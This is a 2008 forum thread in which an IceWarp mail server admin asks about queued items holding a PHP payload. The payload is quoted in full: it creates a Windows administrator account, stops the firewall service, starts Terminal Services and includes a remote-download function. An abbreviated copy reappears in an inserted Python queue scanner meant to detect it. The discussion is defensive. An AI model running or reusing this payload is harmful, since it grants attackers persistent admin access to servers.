IceWarp Server User to User Forum


Hack attempt?

Hack attempt? - 10/13/2008 7:27:56 PM   
triangulum
I've recently been getting a lot of messages stuck in the queue that are pure PHP code:


------------------------------6a52fd0313af
Content-Disposition: form-data; name="data"
ob_start();
phpinfo();
$phpinfo = array('phpinfo' => array());
if(preg_match_all('#(?:<h2>(?:<a name=".*?">)?(.*?)(?:</a>)?</h2>)|(?:<tr(?: class=".*?")?><t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>(?:<t[hd](?: class=".*?")?>(.*?)\s*</t[hd]>)?)?</tr>)#s', ob_get_clean(), $matches, PREG_SET_ORDER))
   foreach($matches as $match)
       if(strlen($match[1]))
           $phpinfo[$match[1]] = array();
       elseif(isset($match[3]))
           $phpinfo[end(array_keys($phpinfo))][$match[2]] = isset($match[4]) ? array($match[3], $match[4]) : $match[3];
       else
           $phpinfo[end(array_keys($phpinfo))][] = $match[2];
echo "VULNERABLE\n";
echo "SYSTEM: ".$phpinfo['phpinfo']['System']."\n";
if($_ENV['OS'] == "Windows_NT") {
$login ="IWAM_".rand (10000, 99999);
$password = "-".rand (10000, 99999)."@";
echo "LOGIN: $login\n";
echo "PASSWORD: $password\n";
@system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES");
@system("net localgroup administrators $login /add");
@system("net localgroup administrateurs $login /add");
@system("net localgroup administratorens $login /add");
@system("net stop sharedaccess");
@system("net start dcomlaunch");
@system("net start termservice");
taille("c:");
taille("d:");
taille("e:");
taille("f:");
taille("g:");
taille("h:");
taille("i:");
taille("j:");
taille("k:");
taille("l:");
taille("m:");
taille("n:"); 
taille("o:");
taille("p:");
taille("q:");
taille("r:");
taille("s:");
taille("t:");
taille("u:");
taille("v:");
taille("w:");
taille("x:");
taille("y:");
taille("z:");
} else {
taille("/");
}
function download($file,$link) {
@unlink($file);
$get = @file_get_contents($link);
$fhack = @fopen ($file, "a");
@fwrite ($fhack, $get);
@fclose ($fhack);
}
function taille($disk) {
// Enter the partition
$dt = disk_total_space($disk);
// Re-enter the partition
$df = disk_free_space($disk);
if(!$dt) { return; }
$used = $dt - $df;
echo "$disk Total: ".getSize($dt)." Free: ".getSize($df)." Used: ".getSize($used)."\n";
}
function getSize($taille, $units = "yes") {
$dimSize = array("octets", "Ko", "Mo", "Go", "To");
$i = 0;
while ($taille >= 1024) {
 $taille /= 1024;
 $i++;
}
return ($units == "yes") ? round($taille, 2) . " " . $dimSize[$i] : round($taille, 2);
}
------------------------------6a52fd0313af--


There is no from, to, or subject. Looks like some kind of hack attempt.

Does anyone have any idea what this does, and any advice on how to block these?

Chris...
Post #: 1
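The question in this post (what the queued item is, and how to spot more of them) can be approached from the defender's side with a small queue scanner. The Python below is an added example written for this thread; it is not IceWarp code and not anything the original poster ran. The queue directory, file names and the two sample messages are constructed for illustration, and the indicator patterns are taken from the payload quoted above. It flags a queued item when it has no From/To/Subject headers at all, when its body is an HTTP multipart form-data post rather than a mail body, and when it contains the user-creation and service-control calls seen in the payload; two or more of those together are treated as grounds for quarantine.

```python
"""Scan a mail queue directory for items that look like the injected PHP
payload quoted in this thread: a bare multipart/form-data body, no
From/To/Subject headers, and PHP that shells out to "net user" etc.

Added example for this thread, not IceWarp code. Paths, file names and the
sample messages below are constructed for illustration.
"""
import email
import os
import re
import tempfile

# Indicators lifted from the payload quoted above. Each one needs the call
# parenthesis or the "net <verb>" form, so ordinary prose mentioning
# "disk_total_space" in passing does not match.
PHP_INDICATORS = {
    "phpinfo": re.compile(r"\bphpinfo\s*\(", re.I),
    "net_user_or_localgroup": re.compile(r"net\s+(user|localgroup)\b", re.I),
    "service_toggle": re.compile(r"net\s+(stop|start)\s+\w+", re.I),
    "remote_fetch": re.compile(r"\bfile_get_contents\s*\(", re.I),
    "disk_enum": re.compile(r"\bdisk_(total|free)_space\s*\(", re.I),
}
FORM_DATA_RE = re.compile(r"^Content-Disposition:\s*form-data;", re.M | re.I)
REQUIRED_HEADERS = ("From", "To", "Subject")


def analyse_message(raw):
    """Return a dict describing why a queued item looks suspicious.
    A score of 2 or more is what we treat as 'quarantine'."""
    # The stdlib parser yields an empty header block when the text does not
    # start with "Name: value" lines, which is exactly the case in the thread.
    msg = email.message_from_string(raw)
    missing = [h for h in REQUIRED_HEADERS if msg.get(h) is None]
    hits = [name for name, rx in PHP_INDICATORS.items() if rx.search(raw)]
    form_data = bool(FORM_DATA_RE.search(raw))
    score = 0
    if len(missing) == len(REQUIRED_HEADERS):
        score += 1  # no envelope headers at all, as in the thread
    if form_data:
        score += 1  # HTTP multipart body, not something a mail client sends
    if hits:
        score += 1  # PHP with OS command / account-creation primitives
    return {"missing_headers": missing, "form_data": form_data,
            "indicators": hits, "score": score, "suspicious": score >= 2}


def scan_queue(queue_dir):
    """Walk a queue directory and return {filename: analysis} for the
    suspicious items only."""
    findings = {}
    for name in sorted(os.listdir(queue_dir)):
        path = os.path.join(queue_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            result = analyse_message(fh.read())
        if result["suspicious"]:
            findings[name] = result
    return findings


# Constructed samples: an abbreviated copy of the queued payload from the
# thread, and an ordinary message that must not be flagged.
PAYLOAD_SAMPLE = """------------------------------6a52fd0313af
Content-Disposition: form-data; name="data"
ob_start();
phpinfo();
echo "VULNERABLE\\n";
@system("net user $login $password /ADD /EXPIRES:NEVER /ACTIVE:YES");
@system("net localgroup administrators $login /add");
@system("net start termservice");
------------------------------6a52fd0313af--
"""

LEGIT_SAMPLE = """From: alice@example.com
To: bob@example.com
Subject: status of the disk report

Hi Bob, the disk_total_space numbers you asked about are attached.
"""


def demo():
    """Write both samples into a temporary queue directory and scan it."""
    with tempfile.TemporaryDirectory() as qdir:
        for fname, body in (("queue-0001.tmp", PAYLOAD_SAMPLE),
                            ("queue-0002.tmp", LEGIT_SAMPLE)):
            with open(os.path.join(qdir, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_queue(qdir)


if __name__ == "__main__":
    for fname, info in demo().items():
        print(fname, info)
```

Pointing `scan_queue` at the real incoming queue directory instead of the temporary one is all that is needed to use it; the indicator list is deliberately tied to the calls in this particular payload and would need extending for other scripts.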
RE: Hack attempt? - 10/18/2008 3:05:59 AM   
marciohumpris
Wow, this is really strange. A message containing code? Where does the message come from? Seems the source code is commented in French.

Maybe send the original message to support and try to figure out a bit more. What do you mean they're stuck in the queue? In the /temp folder?

regards,
Marcio

(in reply to triangulum)
Post #: 2
RE: Hack attempt? - 10/25/2008 4:44:50 AM   
triangulum
Hi Marcio

They're sitting in the incoming queue and never get passed through anywhere. There's no "from" or "to", and I can't link them to a specific connection.

I've been going through firewall logs but no luck yet. I think I'll ask support as you suggest.

(in reply to marciohumpris)
Post #: 3
RE: Hack attempt? - 10/31/2008 4:45:23 AM   
marciohumpris

Hi, Triangulum

Quite strange!! Never seen this. I suggest you send to support so they can try to figure it out.

If you find out, please keep us posted, we're also curious :)

regards,
Marcio

(in reply to triangulum)
Post #: 4
RE: Hack attempt? - 11/12/2008 6:17:52 AM   
IceWarpTR Ozcanyildiz
Dear Chris,
In my experience this is a basic Windows system service hacking attempt written in PHP.
This code checks and tries to stop and start some services for remote desktop connections.
There are several pieces of code which try to find authenticated user credentials, and in this way, if you simply logged into the server with any username and password, the server assumes that user is a Windows user and the hacker can use this by stopping or starting some services. Simply, it starts Terminal Services, and with its username and password the hacker can log in. This means the user is in... If you use the Windows Authentication method, the web browser sends the logged-in user's credentials to the web server; in this way you can tell which Windows user is logged in. If you are using the PHP/ASP auth method, by this method no one can see the credentials.


Cheers.

Ozcan /Turkey

< Message edited by IWAdmin DanG -- 11/13/2008 8:01:12 AM >

(in reply to marciohumpris)
Post #: 5
2001 - 2008 © IceWarp